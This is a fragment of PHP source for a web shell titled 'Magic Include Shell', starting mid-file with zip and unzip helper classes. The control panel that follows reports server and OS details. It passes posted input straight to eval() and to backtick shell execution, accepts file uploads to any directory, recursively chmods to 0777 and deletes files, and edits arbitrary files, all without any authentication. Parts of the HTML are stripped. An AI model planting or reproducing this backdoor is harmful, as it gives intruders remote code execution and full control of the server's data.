> 1); } function addDir($name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04"; $fr .= "\x0a\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00\x00\x00"; $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("v", strlen($name) ); $fr .= pack("v", 0 ); $fr .= $name; $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x0a\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $ext = "\x00\x00\x10\x00"; $ext = "\xff\xff\xff\xff"; $cdrec .= pack("V", 16 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $name = str_replace(array('../','./'), '', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $this -> datasec[] = $fr; $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } function addFiles($files) { foreach($files as $file) { if (is_file($file)) { $data = implode("",file($file)); $this->addFile($data,$file); } } } function output($file) { $fp=fopen($file,"w"); fwrite($fp,$this->file()); fclose($fp); } } class SimpleUnzip { var $Comment = ''; var $Entries = array(); var $Name = ''; var $Size = 0; var $Time = 0; function SimpleUnzip($in_FileName = '') { if ($in_FileName !== '') { SimpleUnzip::ReadFile($in_FileName); } } function Count() { return count($this->Entries); } function GetData($in_Index) { return $this->Entries[$in_Index]->Data; } function GetEntry($in_Index) { return $this->Entries[$in_Index]; } function GetError($in_Index) { return $this->Entries[$in_Index]->Error; } function GetErrorMsg($in_Index) { return $this->Entries[$in_Index]->ErrorMsg; } function GetName($in_Index) { return $this->Entries[$in_Index]->Name; } function GetPath($in_Index) { return $this->Entries[$in_Index]->Path; } function GetTime($in_Index) { return $this->Entries[$in_Index]->Time; } function ReadFile($in_FileName) { $this->Entries = array(); $this->Name = $in_FileName; $this->Time = filemtime($in_FileName); $this->Size = filesize($in_FileName); $oF = fopen($in_FileName, 'rb'); $vZ = fread($oF, $this->Size); fclose($oF); $aE = explode("\x50\x4b\x05\x06", $vZ); $aP = unpack('x16/v1CL', $aE[1]); $this->Comment = substr($aE[1], 18, $aP['CL']); $this->Comment = strtr($this->Comment, array("\r\n" => "\n","\r" => "\n")); $aE = explode("\x50\x4b\x01\x02", $vZ); $aE = explode("\x50\x4b\x03\x04", $aE[0]); array_shift($aE); foreach ($aE as $vZ) { $aI = array(); $aI['E'] = 0; $aI['EM'] = ''; $aP = unpack('v1VN/v1GPF/v1CM/v1FT/v1FD/V1CRC/V1CS/V1UCS/v1FNL', $vZ); $bE = ($aP['GPF'] && 0x0001) ? TRUE : FALSE; $nF = $aP['FNL']; if ($aP['GPF'] & 0x0008) { $aP1 = unpack('V1CRC/V1CS/V1UCS', substr($vZ, -12)); $aP['CRC'] = $aP1['CRC']; $aP['CS'] = $aP1['CS']; $aP['UCS'] = $aP1['UCS']; $vZ = substr($vZ, 0, -12); } $aI['N'] = substr($vZ, 26, $nF); if (substr($aI['N'], -1) == '/') { continue; } $aI['P'] = dirname($aI['N']); $aI['P'] = $aI['P'] == '.' ? '' : $aI['P']; $aI['N'] = basename($aI['N']); $vZ = substr($vZ, 26 + $nF); if (strlen($vZ) != $aP['CS']) { $aI['E'] = 1; $aI['EM'] = 'Compressed size is not equal with the value in header information.'; } else { if ($bE) { $aI['E'] = 5; $aI['EM'] = 'File is encrypted, which is not supported from this class.'; } else { switch($aP['CM']) { case 0: break; case 8: $vZ = gzinflate($vZ); break; case 12: if (! extension_loaded('bz2')) { if (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN') { @dl('php_bz2.dll'); } else { @dl('bz2.so'); } } if (extension_loaded('bz2')) { $vZ = bzdecompress($vZ); } else { $aI['E'] = 7; $aI['EM'] = "PHP BZIP2 extension not available."; } break; default: $aI['E'] = 6; $aI['EM'] = "De-/Compression method {$aP['CM']} is not supported."; } if (! $aI['E']) { if ($vZ === FALSE) { $aI['E'] = 2; $aI['EM'] = 'Decompression of data failed.'; } else { if (strlen($vZ) != $aP['UCS']) { $aI['E'] = 3; $aI['EM'] = 'Uncompressed size is not equal with the value in header information.'; } else { if (crc32($vZ) != $aP['CRC']) { $aI['E'] = 4; $aI['EM'] = 'CRC32 checksum is not equal with the value in header information.'; } } } } } } $aI['D'] = $vZ; $aI['T'] = mktime(($aP['FT'] & 0xf800) >> 11, ($aP['FT'] & 0x07e0) >> 5, ($aP['FT'] & 0x001f) << 1, ($aP['FD'] & 0x01e0) >> 5, ($aP['FD'] & 0x001f), (($aP['FD'] & 0xfe00) >> 9) + 1980); $this->Entries[] = &new SimpleUnzipEntry($aI); } return $this->Entries; } } class SimpleUnzipEntry { var $Data = ''; var $Error = 0; var $ErrorMsg = ''; var $Name = ''; var $Path = ''; var $Time = 0; function SimpleUnzipEntry($in_Entry) { $this->Data = $in_Entry['D']; $this->Error = $in_Entry['E']; $this->ErrorMsg = $in_Entry['EM']; $this->Name = $in_Entry['N']; $this->Path = $in_Entry['P']; $this->Time = $in_Entry['T']; } } function unzipFile($filename, $destination_folder) { if (substr($destination_folder, -1) != '/') { $destination_folder = $destination_folder .'/'; } $vzip = new SimpleUnzip($filename); foreach ($vzip->Entries as $extr) { $path = $extr->Path; $path_folder = explode ('/', $path); $new_path = ''; foreach ($path_folder as $folder) { $new_path .= $folder .'/'; $to_create = $destination_folder . $new_path; if (substr($to_create, -1) == '/') { $to_create = substr($to_create, 0, strlen($to_create)-1); } @mkdir($to_create, 0777); } $new_path = ''; $filev = fopen ($destination_folder. $extr->Path .'/'. $extr->Name, 'w'); fwrite ($filev, $extr->Data); fclose ($filev); } } function dd($file) { if (is_dir($file) || is_file($file)) { chmod($file,0777); if (is_dir($file)) { $handle = opendir($file); while($filename = readdir($handle)) if ($filename != "." && $filename != "..") dd($file."/".$filename); closedir($handle); if(@rmdir($file)) print "$file deleted!
"; else print "$file delete error!
"; } else { if(@unlink($file)) print "$file deleted!
"; else print "$file delete error!
"; } } } function add2zipfile($file) { if (file_exists($file)) { chmod($file,0777); if (is_dir($file)) { $handle = opendir($file); while($filename = readdir($handle)) if ($filename != "." && $filename != "..") { $archive.=add2zipfile(rtrim($file,'/').'/'.$filename).',:,'; //$archive.=rtrim($file,'/').'/'.$filename.',:,'; } closedir($handle); return $archive; } else { $archive.=$file; return $archive; } } } function U_sapi() { switch(PHP_SAPI) { case 'apache2handler': return 'Apache 2.0 Handler'; case 'apache': return 'Apache'; case 'cgi': return 'CGI'; case 'cgi-fcgi': return 'CGI/FastCGI'; default: return PHP_SAPI; } } function U_getos() { if (function_exists('php_uname')) return php_uname(); if (PHP_OS == 'WINNT') return 'Windows NT'; return PHP_OS; } $site=$PHP_SELF; header("Content-type: text/html"); $file2zip=$_POST['file2zip']; $deldira=$_POST['deldira']; $arhiv=$_POST['arhiv']; $dira=$_GET['dira']; (empty($dira) || !isset($dira)) ? $dira='./' : ''; if(!ereg("/$",$dira)) $dira=$dira.'/'; $comanda=$_POST['comanda']; $shcom=$_POST['shcom']; if(isset($_POST['filee']) && !empty($_POST['filee'])) $filee=$_POST['filee']; elseif(isset($_GET['filee']) && !empty($_GET['filee'])) $filee=$dira.''.$_GET['filee']; $uploadfile=$_POST['uploadfile']; $uploaddir=$_POST['uploaddir']; $del=$_POST[del]; if(isset($_POST['edit']) && !empty($_POST['edit'])) $edit=$_POST['edit']; elseif(isset($_GET['edit']) && !empty($_GET['edit'])) $edit=$_GET['edit']; $save_edit=$_POST[save_edit]; function cutter($str,$sym,$len){ do{$serr=1; if(strpos($str,$sym)!==false){ $serr=0; $str1 = substr($str,0,strpos($str,$sym)); $str2 = substr($str,strpos($str,$sym)+$len,strlen($str)); $str = $str1.$str2; } } while($serr==0); return $str; } $kverya=cutter($_SERVER["QUERY_STRING"],'dira=',999); while(ereg('&&',$kverya)) { $kverya=str_replace('&&','&',$kverya); } ?> Magic Include Shell <?php echo $ver; ?>
">
Server: '; print U_sapi(); if(function_exists('apache_get_version')) print ' ['.apache_get_version().']'; print '
'; print '
System: '; print U_getos(); print '
'; print 'Php version: '.PHP_VERSION.'
'; print 'Hostname:Port: '.$_SERVER['SERVER_NAME'].':'.$_SERVER['SERVER_PORT']; ?>
Php eval:
"> Shell command:

" method="post"> File to upload:

Dir to upload:
addDir($ziparc[$i]); print "{$ziparc[$i]} added!
"; } elseif(is_file($ziparc[$i])) { $name2add=explode('../',$ziparc[$i]); $name2add=$name2add[count($name2add)-1]; $ziper->addFile(file_get_contents($ziparc[$i]),$name2add); print "{$ziparc[$i]} added!
"; } } } } $ziper->output($_POST[zip_path]); } if(!empty($deldira) && is_array($deldira) && isset($_POST[delete_submit])) { for($i=0;$i"; else print "Rename error!
"; } if(!empty($comanda)) { eval(trim(stripslashes($comanda))); } if(!empty($shcom)) { print '
'.`$shcom`.'
'; } if(!empty($_FILES['uploadfile']['name'])) { @copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? print "File ".$_FILES['uploadfile']['name']." uploaded succesfully!
" : print "Upload error!
"; } if(!empty($del) && is_array($del) && isset($_POST[delete_submit])) { for($i=0;$i'.$del[$i].' deleted succesfully!
'; } } if(!empty($filee)) { ?> 

"),array('#FFFFFF',''),highlight_string($filee,true));
else
	print $filee;
?>
">
$edit edited succesfully!
"; } print 'Dir='.$dira.'
'; if(!($dp = opendir($dira))) die ("Cannot open ./"); $file_array = array(); while ($file = readdir ($dp)) { $file_array[] = $file; } sort ($file_array); print '
'; while (list($fileIndexValue, $file_name) = each ($file_array)) { if(is_file($dira.''.$file_name)) { echo ""; if(is_writeable($dira.''.$file_name)) { $file_name_array=explode('.',$file_name); $file_name_ext=$file_name_array[count($file_name_array)-1]; echo ""; echo ""; echo ""; } else { echo ""; echo ""; echo ""; } if(is_readable($dira.''.$file_name)) { if($file_name_ext!='zip') echo ""; else echo ""; if($file_name_ext=='zip') echo ""; else echo ""; } else { echo ""; echo ""; } print ''; } else { echo ""; echo ""; $dir_for_del=rtrim($dira,'/').'/'.$file_name; if($file_name!='.' && $file_name!='..' && is_writeable($dir_for_del)) { echo ""; echo ""; } elseif($file_name!='.' && $file_name!='..' && !is_writeable($dir_for_del)) echo ""; if(is_readable($dir_for_del) && $file_name!='.' && $file_name!='..') echo ""; elseif(!is_readable($dir_for_del) && $file_name!='.' && $file_name!='..') echo ""; if($file_name=='.' || $file_name=='..') echo ""; echo ''; } } print '
Name Edit to to to
$file_name (". round(filesize($dira.''.$file_name)/1024,1) . "kb)edit       
$file_name         
'; ?>